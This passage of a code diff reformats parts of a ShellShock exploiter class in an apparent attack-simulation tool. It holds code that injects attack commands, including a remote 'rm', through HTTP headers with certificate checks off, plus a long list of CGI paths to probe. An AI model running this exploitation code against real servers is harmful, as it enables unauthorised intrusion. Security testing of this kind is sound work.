self.attack_page(url, header, cmd)
|
self.attack_page(url, header, cmd)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def _remove_lock_file(self, exploit, url, header):
|
def _remove_lock_file(self, exploit, url, header):
|
||||||
cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
|
cmd = exploit + "rm %s" % LOCK_HELPER_FILE
|
||||||
self.attack_page(url, header, cmd)
|
self.attack_page(url, header, cmd)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -213,7 +240,9 @@ class ShellShockExploiter(HostExploiter):
|
||||||
try:
|
try:
|
||||||
LOG.debug("Header is: %s" % header)
|
LOG.debug("Header is: %s" % header)
|
||||||
LOG.debug("Attack is: %s" % attack)
|
LOG.debug("Attack is: %s" % attack)
|
||||||
r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) # noqa: DUO123
|
r = requests.get(
|
||||||
|
url, headers={header: attack}, verify=False, timeout=TIMEOUT
|
||||||
|
) # noqa: DUO123
|
||||||
result = r.content.decode()
|
result = r.content.decode()
|
||||||
return result
|
return result
|
||||||
except requests.exceptions.RequestException as exc:
|
except requests.exceptions.RequestException as exc:
|
||||||
|
@ -226,9 +255,9 @@ class ShellShockExploiter(HostExploiter):
|
||||||
Checks if which urls exist
|
Checks if which urls exist
|
||||||
:return: Sequence of URLs to try and attack
|
:return: Sequence of URLs to try and attack
|
||||||
"""
|
"""
|
||||||
attack_path = 'http://'
|
attack_path = "http://"
|
||||||
if is_https:
|
if is_https:
|
||||||
attack_path = 'https://'
|
attack_path = "https://"
|
||||||
attack_path = attack_path + str(host) + ":" + str(port)
|
attack_path = attack_path + str(host) + ":" + str(port)
|
||||||
reqs = []
|
reqs = []
|
||||||
timeout = False
|
timeout = False
|
||||||
|
@ -240,7 +269,9 @@ class ShellShockExploiter(HostExploiter):
|
||||||
timeout = True
|
timeout = True
|
||||||
break
|
break
|
||||||
if timeout:
|
if timeout:
|
||||||
LOG.debug("Some connections timed out while sending request to potentially vulnerable urls.")
|
LOG.debug(
|
||||||
|
"Some connections timed out while sending request to potentially vulnerable urls."
|
||||||
|
)
|
||||||
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
|
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
|
||||||
urls = [resp.url for resp in valid_resps]
|
urls = [resp.url for resp in valid_resps]
|
||||||
|
|
||||||
|
|
|
@ -2,407 +2,407 @@
|
||||||
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
|
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
|
||||||
|
|
||||||
CGI_FILES = (
|
CGI_FILES = (
|
||||||
r'/',
|
r"/",
|
||||||
r'/admin.cgi',
|
r"/admin.cgi",
|
||||||
r'/administrator.cgi',
|
r"/administrator.cgi",
|
||||||
r'/agora.cgi',
|
r"/agora.cgi",
|
||||||
r'/aktivate/cgi-bin/catgy.cgi',
|
r"/aktivate/cgi-bin/catgy.cgi",
|
||||||
r'/analyse.cgi',
|
r"/analyse.cgi",
|
||||||
r'/apps/web/vs_diag.cgi',
|
r"/apps/web/vs_diag.cgi",
|
||||||
r'/axis-cgi/buffer/command.cgi',
|
r"/axis-cgi/buffer/command.cgi",
|
||||||
r'/b2-include/b2edit.showposts.php',
|
r"/b2-include/b2edit.showposts.php",
|
||||||
r'/bandwidth/index.cgi',
|
r"/bandwidth/index.cgi",
|
||||||
r'/bigconf.cgi',
|
r"/bigconf.cgi",
|
||||||
r'/cartcart.cgi',
|
r"/cartcart.cgi",
|
||||||
r'/cart.cgi',
|
r"/cart.cgi",
|
||||||
r'/ccbill/whereami.cgi',
|
r"/ccbill/whereami.cgi",
|
||||||
r'/cgi-bin/14all-1.1.cgi',
|
r"/cgi-bin/14all-1.1.cgi",
|
||||||
r'/cgi-bin/14all.cgi',
|
r"/cgi-bin/14all.cgi",
|
||||||
r'/cgi-bin/a1disp3.cgi',
|
r"/cgi-bin/a1disp3.cgi",
|
||||||
r'/cgi-bin/a1stats/a1disp3.cgi',
|
r"/cgi-bin/a1stats/a1disp3.cgi",
|
||||||
r'/cgi-bin/a1stats/a1disp4.cgi',
|
r"/cgi-bin/a1stats/a1disp4.cgi",
|
||||||
r'/cgi-bin/addbanner.cgi',
|
r"/cgi-bin/addbanner.cgi",
|
||||||
r'/cgi-bin/add_ftp.cgi',
|
r"/cgi-bin/add_ftp.cgi",
|
||||||
r'/cgi-bin/adduser.cgi',
|
r"/cgi-bin/adduser.cgi",
|
||||||
r'/cgi-bin/admin/admin.cgi',
|
r"/cgi-bin/admin/admin.cgi",
|
||||||
r'/cgi-bin/admin.cgi',
|
r"/cgi-bin/admin.cgi",
|
||||||
r'/cgi-bin/admin/getparam.cgi',
|
r"/cgi-bin/admin/getparam.cgi",
|
||||||
r'/cgi-bin/adminhot.cgi',
|
r"/cgi-bin/adminhot.cgi",
|
||||||
r'/cgi-bin/admin.pl',
|
r"/cgi-bin/admin.pl",
|
||||||
r'/cgi-bin/admin/setup.cgi',
|
r"/cgi-bin/admin/setup.cgi",
|
||||||
r'/cgi-bin/adminwww.cgi',
|
r"/cgi-bin/adminwww.cgi",
|
||||||
r'/cgi-bin/af.cgi',
|
r"/cgi-bin/af.cgi",
|
||||||
r'/cgi-bin/aglimpse.cgi',
|
r"/cgi-bin/aglimpse.cgi",
|
||||||
r'/cgi-bin/alienform.cgi',
|
r"/cgi-bin/alienform.cgi",
|
||||||
r'/cgi-bin/AnyBoard.cgi',
|
r"/cgi-bin/AnyBoard.cgi",
|
||||||
r'/cgi-bin/architext_query.cgi',
|
r"/cgi-bin/architext_query.cgi",
|
||||||
r'/cgi-bin/astrocam.cgi',
|
r"/cgi-bin/astrocam.cgi",
|
||||||
r'/cgi-bin/AT-admin.cgi',
|
r"/cgi-bin/AT-admin.cgi",
|
||||||
r'/cgi-bin/AT-generate.cgi',
|
r"/cgi-bin/AT-generate.cgi",
|
||||||
r'/cgi-bin/auction/auction.cgi',
|
r"/cgi-bin/auction/auction.cgi",
|
||||||
r'/cgi-bin/auktion.cgi',
|
r"/cgi-bin/auktion.cgi",
|
||||||
r'/cgi-bin/ax-admin.cgi',
|
r"/cgi-bin/ax-admin.cgi",
|
||||||
r'/cgi-bin/ax.cgi',
|
r"/cgi-bin/ax.cgi",
|
||||||
r'/cgi-bin/axs.cgi',
|
r"/cgi-bin/axs.cgi",
|
||||||
r'/cgi-bin/badmin.cgi',
|
r"/cgi-bin/badmin.cgi",
|
||||||
r'/cgi-bin/banner.cgi',
|
r"/cgi-bin/banner.cgi",
|
||||||
r'/cgi-bin/bannereditor.cgi',
|
r"/cgi-bin/bannereditor.cgi",
|
||||||
r'/cgi-bin/bb-ack.sh',
|
r"/cgi-bin/bb-ack.sh",
|
||||||
r'/cgi-bin/bb-histlog.sh',
|
r"/cgi-bin/bb-histlog.sh",
|
||||||
r'/cgi-bin/bb-hist.sh',
|
r"/cgi-bin/bb-hist.sh",
|
||||||
r'/cgi-bin/bb-hostsvc.sh',
|
r"/cgi-bin/bb-hostsvc.sh",
|
||||||
r'/cgi-bin/bb-replog.sh',
|
r"/cgi-bin/bb-replog.sh",
|
||||||
r'/cgi-bin/bb-rep.sh',
|
r"/cgi-bin/bb-rep.sh",
|
||||||
r'/cgi-bin/bbs_forum.cgi',
|
r"/cgi-bin/bbs_forum.cgi",
|
||||||
r'/cgi-bin/bigconf.cgi',
|
r"/cgi-bin/bigconf.cgi",
|
||||||
r'/cgi-bin/bizdb1-search.cgi',
|
r"/cgi-bin/bizdb1-search.cgi",
|
||||||
r'/cgi-bin/blog/mt-check.cgi',
|
r"/cgi-bin/blog/mt-check.cgi",
|
||||||
r'/cgi-bin/blog/mt-load.cgi',
|
r"/cgi-bin/blog/mt-load.cgi",
|
||||||
r'/cgi-bin/bnbform.cgi',
|
r"/cgi-bin/bnbform.cgi",
|
||||||
r'/cgi-bin/book.cgi',
|
r"/cgi-bin/book.cgi",
|
||||||
r'/cgi-bin/boozt/admin/index.cgi',
|
r"/cgi-bin/boozt/admin/index.cgi",
|
||||||
r'/cgi-bin/bsguest.cgi',
|
r"/cgi-bin/bsguest.cgi",
|
||||||
r'/cgi-bin/bslist.cgi',
|
r"/cgi-bin/bslist.cgi",
|
||||||
r'/cgi-bin/build.cgi',
|
r"/cgi-bin/build.cgi",
|
||||||
r'/cgi-bin/bulk/bulk.cgi',
|
r"/cgi-bin/bulk/bulk.cgi",
|
||||||
r'/cgi-bin/cached_feed.cgi',
|
r"/cgi-bin/cached_feed.cgi",
|
||||||
r'/cgi-bin/cachemgr.cgi',
|
r"/cgi-bin/cachemgr.cgi",
|
||||||
r'/cgi-bin/calendar/index.cgi',
|
r"/cgi-bin/calendar/index.cgi",
|
||||||
r'/cgi-bin/cartmanager.cgi',
|
r"/cgi-bin/cartmanager.cgi",
|
||||||
r'/cgi-bin/cbmc/forums.cgi',
|
r"/cgi-bin/cbmc/forums.cgi",
|
||||||
r'/cgi-bin/ccvsblame.cgi',
|
r"/cgi-bin/ccvsblame.cgi",
|
||||||
r'/cgi-bin/c_download.cgi',
|
r"/cgi-bin/c_download.cgi",
|
||||||
r'/cgi-bin/cgforum.cgi',
|
r"/cgi-bin/cgforum.cgi",
|
||||||
r'/cgi-bin/.cgi',
|
r"/cgi-bin/.cgi",
|
||||||
r'/cgi-bin/cgi_process',
|
r"/cgi-bin/cgi_process",
|
||||||
r'/cgi-bin/classified.cgi',
|
r"/cgi-bin/classified.cgi",
|
||||||
r'/cgi-bin/classifieds.cgi',
|
r"/cgi-bin/classifieds.cgi",
|
||||||
r'/cgi-bin/classifieds/classifieds.cgi',
|
r"/cgi-bin/classifieds/classifieds.cgi",
|
||||||
r'/cgi-bin/classifieds/index.cgi',
|
r"/cgi-bin/classifieds/index.cgi",
|
||||||
r'/cgi-bin/.cobalt/alert/service.cgi',
|
r"/cgi-bin/.cobalt/alert/service.cgi",
|
||||||
r'/cgi-bin/.cobalt/message/message.cgi',
|
r"/cgi-bin/.cobalt/message/message.cgi",
|
||||||
r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
|
r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
|
||||||
r'/cgi-bin/commandit.cgi',
|
r"/cgi-bin/commandit.cgi",
|
||||||
r'/cgi-bin/commerce.cgi',
|
r"/cgi-bin/commerce.cgi",
|
||||||
r'/cgi-bin/common/listrec.pl',
|
r"/cgi-bin/common/listrec.pl",
|
||||||
r'/cgi-bin/compatible.cgi',
|
r"/cgi-bin/compatible.cgi",
|
||||||
r'/cgi-bin/Count.cgi',
|
r"/cgi-bin/Count.cgi",
|
||||||
r'/cgi-bin/csChatRBox.cgi',
|
r"/cgi-bin/csChatRBox.cgi",
|
||||||
r'/cgi-bin/csGuestBook.cgi',
|
r"/cgi-bin/csGuestBook.cgi",
|
||||||
r'/cgi-bin/csLiveSupport.cgi',
|
r"/cgi-bin/csLiveSupport.cgi",
|
||||||
r'/cgi-bin/CSMailto.cgi',
|
r"/cgi-bin/CSMailto.cgi",
|
||||||
r'/cgi-bin/CSMailto/CSMailto.cgi',
|
r"/cgi-bin/CSMailto/CSMailto.cgi",
|
||||||
r'/cgi-bin/csNews.cgi',
|
r"/cgi-bin/csNews.cgi",
|
||||||
r'/cgi-bin/csNewsPro.cgi',
|
r"/cgi-bin/csNewsPro.cgi",
|
||||||
r'/cgi-bin/csPassword.cgi',
|
r"/cgi-bin/csPassword.cgi",
|
||||||
r'/cgi-bin/csPassword/csPassword.cgi',
|
r"/cgi-bin/csPassword/csPassword.cgi",
|
||||||
r'/cgi-bin/csSearch.cgi',
|
r"/cgi-bin/csSearch.cgi",
|
||||||
r'/cgi-bin/csv_db.cgi',
|
r"/cgi-bin/csv_db.cgi",
|
||||||
r'/cgi-bin/cvsblame.cgi',
|
r"/cgi-bin/cvsblame.cgi",
|
||||||
r'/cgi-bin/cvslog.cgi',
|
r"/cgi-bin/cvslog.cgi",
|
||||||
r'/cgi-bin/cvsquery.cgi',
|
r"/cgi-bin/cvsquery.cgi",
|
||||||
r'/cgi-bin/cvsqueryform.cgi',
|
r"/cgi-bin/cvsqueryform.cgi",
|
||||||
r'/cgi-bin/day5datacopier.cgi',
|
r"/cgi-bin/day5datacopier.cgi",
|
||||||
r'/cgi-bin/day5datanotifier.cgi',
|
r"/cgi-bin/day5datanotifier.cgi",
|
||||||
r'/cgi-bin/db_manager.cgi',
|
r"/cgi-bin/db_manager.cgi",
|
||||||
r'/cgi-bin/dbman/db.cgi',
|
r"/cgi-bin/dbman/db.cgi",
|
||||||
r'/cgi-bin/dcforum.cgi',
|
r"/cgi-bin/dcforum.cgi",
|
||||||
r'/cgi-bin/dcshop.cgi',
|
r"/cgi-bin/dcshop.cgi",
|
||||||
r'/cgi-bin/dfire.cgi',
|
r"/cgi-bin/dfire.cgi",
|
||||||
r'/cgi-bin/diagnose.cgi',
|
r"/cgi-bin/diagnose.cgi",
|
||||||
r'/cgi-bin/dig.cgi',
|
r"/cgi-bin/dig.cgi",
|
||||||
r'/cgi-bin/directorypro.cgi',
|
r"/cgi-bin/directorypro.cgi",
|
||||||
r'/cgi-bin/download.cgi',
|
r"/cgi-bin/download.cgi",
|
||||||
r'/cgi-bin/e87_Ba79yo87.cgi',
|
r"/cgi-bin/e87_Ba79yo87.cgi",
|
||||||
r'/cgi-bin/emu/html/emumail.cgi',
|
r"/cgi-bin/emu/html/emumail.cgi",
|
||||||
r'/cgi-bin/emumail.cgi',
|
r"/cgi-bin/emumail.cgi",
|
||||||
r'/cgi-bin/emumail/emumail.cgi',
|
r"/cgi-bin/emumail/emumail.cgi",
|
||||||
r'/cgi-bin/enter.cgi',
|
r"/cgi-bin/enter.cgi",
|
||||||
r'/cgi-bin/environ.cgi',
|
r"/cgi-bin/environ.cgi",
|
||||||
r'/cgi-bin/ezadmin.cgi',
|
r"/cgi-bin/ezadmin.cgi",
|
||||||
r'/cgi-bin/ezboard.cgi',
|
r"/cgi-bin/ezboard.cgi",
|
||||||
r'/cgi-bin/ezman.cgi',
|
r"/cgi-bin/ezman.cgi",
|
||||||
r'/cgi-bin/ezshopper2/loadpage.cgi',
|
r"/cgi-bin/ezshopper2/loadpage.cgi",
|
||||||
r'/cgi-bin/ezshopper3/loadpage.cgi',
|
r"/cgi-bin/ezshopper3/loadpage.cgi",
|
||||||
r'/cgi-bin/ezshopper/loadpage.cgi',
|
r"/cgi-bin/ezshopper/loadpage.cgi",
|
||||||
r'/cgi-bin/ezshopper/search.cgi',
|
r"/cgi-bin/ezshopper/search.cgi",
|
||||||
r'/cgi-bin/faqmanager.cgi',
|
r"/cgi-bin/faqmanager.cgi",
|
||||||
r'/cgi-bin/FileSeek2.cgi',
|
r"/cgi-bin/FileSeek2.cgi",
|
||||||
r'/cgi-bin/FileSeek.cgi',
|
r"/cgi-bin/FileSeek.cgi",
|
||||||
r'/cgi-bin/finger.cgi',
|
r"/cgi-bin/finger.cgi",
|
||||||
r'/cgi-bin/flexform.cgi',
|
r"/cgi-bin/flexform.cgi",
|
||||||
r'/cgi-bin/fom.cgi',
|
r"/cgi-bin/fom.cgi",
|
||||||
r'/cgi-bin/fom/fom.cgi',
|
r"/cgi-bin/fom/fom.cgi",
|
||||||
r'/cgi-bin/FormHandler.cgi',
|
r"/cgi-bin/FormHandler.cgi",
|
||||||
r'/cgi-bin/FormMail.cgi',
|
r"/cgi-bin/FormMail.cgi",
|
||||||
r'/cgi-bin/gbadmin.cgi',
|
r"/cgi-bin/gbadmin.cgi",
|
||||||
r'/cgi-bin/gbook/gbook.cgi',
|
r"/cgi-bin/gbook/gbook.cgi",
|
||||||
r'/cgi-bin/generate.cgi',
|
r"/cgi-bin/generate.cgi",
|
||||||
r'/cgi-bin/getdoc.cgi',
|
r"/cgi-bin/getdoc.cgi",
|
||||||
r'/cgi-bin/gH.cgi',
|
r"/cgi-bin/gH.cgi",
|
||||||
r'/cgi-bin/gm-authors.cgi',
|
r"/cgi-bin/gm-authors.cgi",
|
||||||
r'/cgi-bin/gm.cgi',
|
r"/cgi-bin/gm.cgi",
|
||||||
r'/cgi-bin/gm-cplog.cgi',
|
r"/cgi-bin/gm-cplog.cgi",
|
||||||
r'/cgi-bin/guestbook.cgi',
|
r"/cgi-bin/guestbook.cgi",
|
||||||
r'/cgi-bin/handler',
|
r"/cgi-bin/handler",
|
||||||
r'/cgi-bin/handler.cgi',
|
r"/cgi-bin/handler.cgi",
|
||||||
r'/cgi-bin/handler/netsonar',
|
r"/cgi-bin/handler/netsonar",
|
||||||
r'/cgi-bin/hitview.cgi',
|
r"/cgi-bin/hitview.cgi",
|
||||||
r'/cgi-bin/hsx.cgi',
|
r"/cgi-bin/hsx.cgi",
|
||||||
r'/cgi-bin/html2chtml.cgi',
|
r"/cgi-bin/html2chtml.cgi",
|
||||||
r'/cgi-bin/html2wml.cgi',
|
r"/cgi-bin/html2wml.cgi",
|
||||||
r'/cgi-bin/htsearch.cgi',
|
r"/cgi-bin/htsearch.cgi",
|
||||||
r'/cgi-bin/hw.sh', # testing
|
r"/cgi-bin/hw.sh", # testing
|
||||||
r'/cgi-bin/icat',
|
r"/cgi-bin/icat",
|
||||||
r'/cgi-bin/if/admin/nph-build.cgi',
|
r"/cgi-bin/if/admin/nph-build.cgi",
|
||||||
r'/cgi-bin/ikonboard/help.cgi',
|
r"/cgi-bin/ikonboard/help.cgi",
|
||||||
r'/cgi-bin/ImageFolio/admin/admin.cgi',
|
r"/cgi-bin/ImageFolio/admin/admin.cgi",
|
||||||
r'/cgi-bin/imageFolio.cgi',
|
r"/cgi-bin/imageFolio.cgi",
|
||||||
r'/cgi-bin/index.cgi',
|
r"/cgi-bin/index.cgi",
|
||||||
r'/cgi-bin/infosrch.cgi',
|
r"/cgi-bin/infosrch.cgi",
|
||||||
r'/cgi-bin/jammail.pl',
|
r"/cgi-bin/jammail.pl",
|
||||||
r'/cgi-bin/journal.cgi',
|
r"/cgi-bin/journal.cgi",
|
||||||
r'/cgi-bin/lastlines.cgi',
|
r"/cgi-bin/lastlines.cgi",
|
||||||
r'/cgi-bin/loadpage.cgi',
|
r"/cgi-bin/loadpage.cgi",
|
||||||
r'/cgi-bin/login.cgi',
|
r"/cgi-bin/login.cgi",
|
||||||
r'/cgi-bin/logit.cgi',
|
r"/cgi-bin/logit.cgi",
|
||||||
r'/cgi-bin/log-reader.cgi',
|
r"/cgi-bin/log-reader.cgi",
|
||||||
r'/cgi-bin/lookwho.cgi',
|
r"/cgi-bin/lookwho.cgi",
|
||||||
r'/cgi-bin/lwgate.cgi',
|
r"/cgi-bin/lwgate.cgi",
|
||||||
r'/cgi-bin/MachineInfo',
|
r"/cgi-bin/MachineInfo",
|
||||||
r'/cgi-bin/MachineInfo',
|
r"/cgi-bin/MachineInfo",
|
||||||
r'/cgi-bin/magiccard.cgi',
|
r"/cgi-bin/magiccard.cgi",
|
||||||
r'/cgi-bin/mail/emumail.cgi',
|
r"/cgi-bin/mail/emumail.cgi",
|
||||||
r'/cgi-bin/maillist.cgi',
|
r"/cgi-bin/maillist.cgi",
|
||||||
r'/cgi-bin/mailnews.cgi',
|
r"/cgi-bin/mailnews.cgi",
|
||||||
r'/cgi-bin/mail/nph-mr.cgi',
|
r"/cgi-bin/mail/nph-mr.cgi",
|
||||||
r'/cgi-bin/main.cgi',
|
r"/cgi-bin/main.cgi",
|
||||||
r'/cgi-bin/main_menu.pl',
|
r"/cgi-bin/main_menu.pl",
|
||||||
r'/cgi-bin/man.sh',
|
r"/cgi-bin/man.sh",
|
||||||
r'/cgi-bin/mini_logger.cgi',
|
r"/cgi-bin/mini_logger.cgi",
|
||||||
r'/cgi-bin/mmstdod.cgi',
|
r"/cgi-bin/mmstdod.cgi",
|
||||||
r'/cgi-bin/moin.cgi',
|
r"/cgi-bin/moin.cgi",
|
||||||
r'/cgi-bin/mojo/mojo.cgi',
|
r"/cgi-bin/mojo/mojo.cgi",
|
||||||
r'/cgi-bin/mrtg.cgi',
|
r"/cgi-bin/mrtg.cgi",
|
||||||
r'/cgi-bin/mt.cgi',
|
r"/cgi-bin/mt.cgi",
|
||||||
r'/cgi-bin/mt/mt.cgi',
|
r"/cgi-bin/mt/mt.cgi",
|
||||||
r'/cgi-bin/mt/mt-check.cgi',
|
r"/cgi-bin/mt/mt-check.cgi",
|
||||||
r'/cgi-bin/mt/mt-load.cgi',
|
r"/cgi-bin/mt/mt-load.cgi",
|
||||||
r'/cgi-bin/mt-static/mt-check.cgi',
|
r"/cgi-bin/mt-static/mt-check.cgi",
|
||||||
r'/cgi-bin/mt-static/mt-load.cgi',
|
r"/cgi-bin/mt-static/mt-load.cgi",
|
||||||
r'/cgi-bin/musicqueue.cgi',
|
r"/cgi-bin/musicqueue.cgi",
|
||||||
r'/cgi-bin/myguestbook.cgi',
|
r"/cgi-bin/myguestbook.cgi",
|
||||||
r'/cgi-bin/.namazu.cgi',
|
r"/cgi-bin/.namazu.cgi",
|
||||||
r'/cgi-bin/nbmember.cgi',
|
r"/cgi-bin/nbmember.cgi",
|
||||||
r'/cgi-bin/netauth.cgi',
|
r"/cgi-bin/netauth.cgi",
|
||||||
r'/cgi-bin/netpad.cgi',
|
r"/cgi-bin/netpad.cgi",
|
||||||
r'/cgi-bin/newsdesk.cgi',
|
r"/cgi-bin/newsdesk.cgi",
|
||||||
r'/cgi-bin/nlog-smb.cgi',
|
r"/cgi-bin/nlog-smb.cgi",
|
||||||
r'/cgi-bin/nph-emumail.cgi',
|
r"/cgi-bin/nph-emumail.cgi",
|
||||||
r'/cgi-bin/nph-exploitscanget.cgi',
|
r"/cgi-bin/nph-exploitscanget.cgi",
|
||||||
r'/cgi-bin/nph-publish.cgi',
|
r"/cgi-bin/nph-publish.cgi",
|
||||||
r'/cgi-bin/nph-test.cgi',
|
r"/cgi-bin/nph-test.cgi",
|
||||||
r'/cgi-bin/pagelog.cgi',
|
r"/cgi-bin/pagelog.cgi",
|
||||||
r'/cgi-bin/pbcgi.cgi',
|
r"/cgi-bin/pbcgi.cgi",
|
||||||
r'/cgi-bin/perlshop.cgi',
|
r"/cgi-bin/perlshop.cgi",
|
||||||
r'/cgi-bin/pfdispaly.cgi',
|
r"/cgi-bin/pfdispaly.cgi",
|
||||||
r'/cgi-bin/pfdisplay.cgi',
|
r"/cgi-bin/pfdisplay.cgi",
|
||||||
r'/cgi-bin/phf.cgi',
|
r"/cgi-bin/phf.cgi",
|
||||||
r'/cgi-bin/photo/manage.cgi',
|
r"/cgi-bin/photo/manage.cgi",
|
||||||
r'/cgi-bin/photo/protected/manage.cgi',
|
r"/cgi-bin/photo/protected/manage.cgi",
|
||||||
r'/cgi-bin/php-cgi',
|
r"/cgi-bin/php-cgi",
|
||||||
r'/cgi-bin/php.cgi',
|
r"/cgi-bin/php.cgi",
|
||||||
r'/cgi-bin/php.fcgi',
|
r"/cgi-bin/php.fcgi",
|
||||||
r'/cgi-bin/ping.sh',
|
r"/cgi-bin/ping.sh",
|
||||||
r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
|
r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
|
||||||
r'/cgi-bin/pollssi.cgi',
|
r"/cgi-bin/pollssi.cgi",
|
||||||
r'/cgi-bin/postcards.cgi',
|
r"/cgi-bin/postcards.cgi",
|
||||||
r'/cgi-bin/powerup/r.cgi',
|
r"/cgi-bin/powerup/r.cgi",
|
||||||
r'/cgi-bin/printenv',
|
r"/cgi-bin/printenv",
|
||||||
r'/cgi-bin/probecontrol.cgi',
|
r"/cgi-bin/probecontrol.cgi",
|
||||||
r'/cgi-bin/profile.cgi',
|
r"/cgi-bin/profile.cgi",
|
||||||
r'/cgi-bin/publisher/search.cgi',
|
r"/cgi-bin/publisher/search.cgi",
|
||||||
r'/cgi-bin/quickstore.cgi',
|
r"/cgi-bin/quickstore.cgi",
|
||||||
r'/cgi-bin/quizme.cgi',
|
r"/cgi-bin/quizme.cgi",
|
||||||
r'/cgi-bin/ratlog.cgi',
|
r"/cgi-bin/ratlog.cgi",
|
||||||
r'/cgi-bin/r.cgi',
|
r"/cgi-bin/r.cgi",
|
||||||
r'/cgi-bin/register.cgi',
|
r"/cgi-bin/register.cgi",
|
||||||
r'/cgi-bin/replicator/webpage.cgi/',
|
r"/cgi-bin/replicator/webpage.cgi/",
|
||||||
r'/cgi-bin/responder.cgi',
|
r"/cgi-bin/responder.cgi",
|
||||||
r'/cgi-bin/robadmin.cgi',
|
r"/cgi-bin/robadmin.cgi",
|
||||||
r'/cgi-bin/robpoll.cgi',
|
r"/cgi-bin/robpoll.cgi",
|
||||||
r'/cgi-bin/rtpd.cgi',
|
r"/cgi-bin/rtpd.cgi",
|
||||||
r'/cgi-bin/sbcgi/sitebuilder.cgi',
|
r"/cgi-bin/sbcgi/sitebuilder.cgi",
|
||||||
r'/cgi-bin/scoadminreg.cgi',
|
r"/cgi-bin/scoadminreg.cgi",
|
||||||
r'/cgi-bin-sdb/printenv',
|
r"/cgi-bin-sdb/printenv",
|
||||||
r'/cgi-bin/sdbsearch.cgi',
|
r"/cgi-bin/sdbsearch.cgi",
|
||||||
r'/cgi-bin/search',
|
r"/cgi-bin/search",
|
||||||
r'/cgi-bin/search.cgi',
|
r"/cgi-bin/search.cgi",
|
||||||
r'/cgi-bin/search/search.cgi',
|
r"/cgi-bin/search/search.cgi",
|
||||||
r'/cgi-bin/sendform.cgi',
|
r"/cgi-bin/sendform.cgi",
|
||||||
r'/cgi-bin/shop.cgi',
|
r"/cgi-bin/shop.cgi",
|
||||||
r'/cgi-bin/shopper.cgi',
|
r"/cgi-bin/shopper.cgi",
|
||||||
r'/cgi-bin/shopplus.cgi',
|
r"/cgi-bin/shopplus.cgi",
|
||||||
r'/cgi-bin/showcheckins.cgi',
|
r"/cgi-bin/showcheckins.cgi",
|
||||||
r'/cgi-bin/simplestguest.cgi',
|
r"/cgi-bin/simplestguest.cgi",
|
||||||
r'/cgi-bin/simplestmail.cgi',
|
r"/cgi-bin/simplestmail.cgi",
|
||||||
r'/cgi-bin/smartsearch.cgi',
|
r"/cgi-bin/smartsearch.cgi",
|
||||||
r'/cgi-bin/smartsearch/smartsearch.cgi',
|
r"/cgi-bin/smartsearch/smartsearch.cgi",
|
||||||
r'/cgi-bin/snorkerz.bat',
|
r"/cgi-bin/snorkerz.bat",
|
||||||
r'/cgi-bin/snorkerz.bat',
|
r"/cgi-bin/snorkerz.bat",
|
||||||
r'/cgi-bin/snorkerz.cmd',
|
r"/cgi-bin/snorkerz.cmd",
|
||||||
r'/cgi-bin/snorkerz.cmd',
|
r"/cgi-bin/snorkerz.cmd",
|
||||||
r'/cgi-bin/sojourn.cgi',
|
r"/cgi-bin/sojourn.cgi",
|
||||||
r'/cgi-bin/spin_client.cgi',
|
r"/cgi-bin/spin_client.cgi",
|
||||||
r'/cgi-bin/start.cgi',
|
r"/cgi-bin/start.cgi",
|
||||||
r'/cgi-bin/status',
|
r"/cgi-bin/status",
|
||||||
r'/cgi-bin/status_cgi',
|
r"/cgi-bin/status_cgi",
|
||||||
r'/cgi-bin/store/agora.cgi',
|
r"/cgi-bin/store/agora.cgi",
|
||||||
r'/cgi-bin/store.cgi',
|
r"/cgi-bin/store.cgi",
|
||||||
r'/cgi-bin/store/index.cgi',
|
r"/cgi-bin/store/index.cgi",
|
||||||
r'/cgi-bin/survey.cgi',
|
r"/cgi-bin/survey.cgi",
|
||||||
r'/cgi-bin/sync.cgi',
|
r"/cgi-bin/sync.cgi",
|
||||||
r'/cgi-bin/talkback.cgi',
|
r"/cgi-bin/talkback.cgi",
|
||||||
r'/cgi-bin/technote/main.cgi',
|
r"/cgi-bin/technote/main.cgi",
|
||||||
r'/cgi-bin/test2.pl',
|
r"/cgi-bin/test2.pl",
|
||||||
r'/cgi-bin/test-cgi',
|
r"/cgi-bin/test-cgi",
|
||||||
r'/cgi-bin/test.cgi',
|
r"/cgi-bin/test.cgi",
|
||||||
r'/cgi-bin/testing_whatever',
|
r"/cgi-bin/testing_whatever",
|
||||||
r'/cgi-bin/test/test.cgi',
|
r"/cgi-bin/test/test.cgi",
|
||||||
r'/cgi-bin/tidfinder.cgi',
|
r"/cgi-bin/tidfinder.cgi",
|
||||||
r'/cgi-bin/tigvote.cgi',
|
r"/cgi-bin/tigvote.cgi",
|
||||||
r'/cgi-bin/title.cgi',
|
r"/cgi-bin/title.cgi",
|
||||||
r'/cgi-bin/top.cgi',
|
r"/cgi-bin/top.cgi",
|
||||||
r'/cgi-bin/traffic.cgi',
|
r"/cgi-bin/traffic.cgi",
|
||||||
r'/cgi-bin/troops.cgi',
|
r"/cgi-bin/troops.cgi",
|
||||||
r'/cgi-bin/ttawebtop.cgi/',
|
r"/cgi-bin/ttawebtop.cgi/",
|
||||||
r'/cgi-bin/ultraboard.cgi',
|
r"/cgi-bin/ultraboard.cgi",
|
||||||
r'/cgi-bin/upload.cgi',
|
r"/cgi-bin/upload.cgi",
|
||||||
r'/cgi-bin/urlcount.cgi',
|
r"/cgi-bin/urlcount.cgi",
|
||||||
r'/cgi-bin/viewcvs.cgi',
|
r"/cgi-bin/viewcvs.cgi",
|
||||||
r'/cgi-bin/view_help.cgi',
|
r"/cgi-bin/view_help.cgi",
|
||||||
r'/cgi-bin/viralator.cgi',
|
r"/cgi-bin/viralator.cgi",
|
||||||
r'/cgi-bin/virgil.cgi',
|
r"/cgi-bin/virgil.cgi",
|
||||||
r'/cgi-bin/vote.cgi',
|
r"/cgi-bin/vote.cgi",
|
||||||
r'/cgi-bin/vpasswd.cgi',
|
r"/cgi-bin/vpasswd.cgi",
|
||||||
r'/cgi-bin/way-board.cgi',
|
